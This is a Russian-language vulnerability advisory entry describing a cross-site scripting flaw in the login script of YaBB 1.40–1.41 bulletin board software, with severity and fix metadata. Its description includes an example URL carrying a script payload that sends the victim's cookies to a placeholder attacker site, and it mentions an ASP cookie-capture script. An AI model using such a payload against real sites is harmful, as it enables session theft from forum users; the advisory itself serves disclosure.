Дата публикации: | 21.10.2002 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1840 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Межсайтовый скриптинг |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | YaBB 1.x |
Описание: | YaBB (Yet Another Bulletin Board) – BBS система от http://www.yabb.org/. Межсайтовый скрптинг обнаружен в сценарии входа в систему. Атакующий может создать злонамеренную ссылку, содержащую произвольный код сценария, который будет выполнен в браузере пользователя, в контексте уязвимого сайта. Пример: http://example.com/forums/index.php? board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script> window.location.href(%22http://www.attackersite.example.com/hack.asp?%22% 2Bdocument.cookie)</script>уязвимость обнаружена в YaBB 1.40-1.41 |
Ссылки: |
Пример ASP сценария, который используется для перехвата куки New Vulnerability on YaBB 1.4.0 and YaBB 1.4.1 forums |